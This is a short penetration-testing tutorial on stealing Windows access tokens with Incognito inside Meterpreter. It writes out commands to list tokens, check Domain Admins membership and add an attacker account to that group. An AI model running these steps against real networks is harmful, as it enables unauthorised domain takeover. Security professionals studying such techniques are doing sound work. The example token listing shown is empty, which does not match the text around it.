PrivEsc: Stealing Windows Access Tokens – Incognito

If an attacker is able to get SYSTEM level access to a workstation, for example by compromising a local administrator account, and a Domain Administrator account is logged in to that machine then it may be possible for the attacker to simply read the administrator’s access token in memory and steal it to allow them to impersonate that account. There’s a tool available to do this, it’s called Incognito.

As with Mimikatz, it’s possible to either call the incognito.exe file directly or load it as an extension into an active Meterpreter shell, to load it into Meterpreter simple run:

meterpreter > use incognito

At this point you can run a command to list which tokens are available on the target machine:

meterpreter > list_tokens -u

The expected output to this command will be something similar to the following:

[*] Enumerating tokens
[*] Listing unique users found

Delegation Tokens Available

Impersonation Tokens Available

As you can see in this example I’ve been lucky enough to find the token for a domain admin account, of course the user name doesn’t necessarily disclose if a user is a domain admin or not, but you could always drop into a shell with the “shell” command and run:

net groups "Domain Admins" /domain

Okay – once you’ve found a target account you can utilize it to create your own domain administrator account with the following command from within Incognito (either the Meterpreter shell or the .exe)

add_group_user "Domain Admins" hacker.da

Read More